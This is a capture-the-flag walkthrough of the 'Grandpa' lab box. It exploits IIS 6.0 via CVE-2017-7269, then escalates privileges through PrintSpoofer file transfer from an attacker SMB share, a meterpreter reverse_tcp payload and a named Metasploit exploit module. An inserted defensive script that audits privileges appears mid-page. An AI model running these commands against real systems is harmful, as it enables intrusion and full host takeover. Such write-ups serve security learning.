Grandpa
Personal Rating: Medium
I rated this box medium because I did it with Metasploit, and it would have taken more effort and different steps to do it without, which was not easy for me at the time.
Initial Access
nmap:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
OS: Windows older than Server 2008 or Windows 7
Searching for the IIS version, I find CVE-2017-7269 everywhere. There is a PoC:
This worked, and I have a shell as NETWORK SERVICE.

Privilege Escalation
C:\>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
With the SeImpersonatePrivilege we should be able to privesc using PrintSpoofer.
With smbserver.py I transferred the PrintSpoofer exploit to the host. For this to work I needed to find the writable directory C:\wmpub\wmiislog.
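As an added defensive check (not part of the original writeup), the following Python script parses a pasted whoami /priv table like the one above and flags the impersonation-related privileges that a service account such as NETWORK SERVICE should not hold; the function names are mine, and the sample output is constructed from the table on this page.

```python
import re
from typing import Dict, List

# Privileges that let a service account impersonate or replace tokens, which
# is what the PrintSpoofer-style escalation on this page relies on; flagging
# them is standard service-account hardening.
RISKY_PRIVILEGES = {
    "SeImpersonatePrivilege": "can impersonate clients after authentication",
    "SeAssignPrimaryTokenPrivilege": "can replace a process-level token",
}

# Constructed sample: the 'whoami /priv' table as it appears on this page.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""
# A data row: privilege name, free-text description, then the state column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Return {privilege_name: state}; header and separator lines are skipped,
    and collapsed whitespace (as in a pasted shell log) does not matter."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def audit_privileges(text: str) -> List[str]:
    """Findings for risky privileges. A disabled privilege is still reported:
    a process can re-enable any privilege it holds, so only removal helps."""
    privs = parse_whoami_priv(text)
    findings = []
    for name, why in RISKY_PRIVILEGES.items():
        state = privs.get(name)
        if state == "Enabled":
            findings.append(f"{name}: ENABLED - {why}")
        elif state == "Disabled":
            findings.append(f"{name}: present but disabled - {why}")
    return findings
```

Run it against output collected from each service account on a host; an empty result for the risky set is what a hardened configuration should produce.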
sudo smbserver.py -smb2support soos .
copy \\10.10.16.2\soos\PrintSpoofer32.exe .\PrintSpoofer32.exe
This did not work and made the shell inaccessible.
I transferred a windows/meterpreter/reverse_tcp payload to the host and ran it:
cmd shell.exe
I then used this exploit to get SYSTEM: windows/local/ms14_058_track_popup_menu
I know that this is the easy way and you should be able to do this without Metasploit.